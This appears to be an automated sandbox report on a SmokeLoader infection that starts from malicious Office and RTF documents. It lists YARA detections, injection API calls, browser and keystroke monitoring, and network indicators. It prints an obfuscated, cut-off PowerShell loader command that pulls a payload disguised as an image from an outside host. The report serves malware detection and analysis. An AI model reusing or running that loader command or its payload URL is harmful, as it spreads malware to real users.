Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 0000000C.00000002.454053406.00000000023DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 0000000C.00000002.458120444.0000000004F50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: F8D.tmp.18.dr	String found in binary or memory: https://www.google.com/favicon.ico
Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49172 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 28_2_000C162B GetKeyboardState,ToUnicode,

28_2_000C162B

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\SysWOW64\explorer.exe	Code function: StrStrIA, chrome.exe\|opera.exe\|msedge.exe	22_2_00082EA8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe	22_2_00083862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe	22_2_00083862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe	22_2_00083862
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe	22_2_00083862

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: Process Memory Space: powershell.exe PID: 3520, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: #20240627_Edlen_A.xls	OLE: Microsoft Excel 2007+
Source: 26330000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nXPJ.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\z2.ink.url			Jump to behavior

Very long command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 8798
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 8798			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 770B0000 page execute and read and write

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_00402321
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004025D3 NtClose,	13_2_004025D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00402686 NtClose,	13_2_00402686
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040328D GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtOpenKey,wcsstr,	13_2_0040328D
Source: C:\Windows\explorer.exe	Code function: 14_2_03F14760 NtCreateSection,	14_2_03F14760
Source: C:\Windows\explorer.exe	Code function: 14_2_03F12FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,CloseHandle,	14_2_03F12FAC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00084B92 RtlMoveMemory,NtUnmapViewOfSection,	18_2_00084B92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000833C3 NtQueryInformationFile,	18_2_000833C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_0008342B NtQueryObject,NtQueryObject,RtlMoveMemory,	18_2_0008342B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_0008349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,	18_2_0008349B
Source: C:\Windows\explorer.exe	Code function: 19_2_000638B0 NtUnmapViewOfSection,	19_2_000638B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_00081016 RtlMoveMemory,NtUnmapViewOfSection,	21_2_00081016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_00083D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,	22_2_00083D8D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_00082E1B OpenProcess,lstrcmpi,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,	22_2_00082E1B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_00081F4E NtCreateSection,NtMapViewOfSection,	22_2_00081F4E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_00081FE5 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	22_2_00081FE5
Source: C:\Windows\explorer.exe	Code function: 23_2_000E5300 RtlAllocateHeap,NtUnmapViewOfSection,	23_2_000E5300
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_00081016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,	24_2_00081016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_00081A80 NtCreateSection,NtMapViewOfSection,	24_2_00081A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_00081819 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	24_2_00081819
Source: C:\Windows\explorer.exe	Code function: 25_2_000E355C RtlAllocateHeap,NtUnmapViewOfSection,	25_2_000E355C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 28_2_000C1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,	28_2_000C1016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 28_2_000C1B26 NtCreateSection,NtMapViewOfSection,	28_2_000C1B26
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 28_2_000C18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	28_2_000C18BF
Source: C:\Windows\explorer.exe	Code function: 29_2_0006370C RtlAllocateHeap,NtUnmapViewOfSection,	29_2_0006370C

Source: C:\Windows\explorer.exe

File deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Jump to behavior

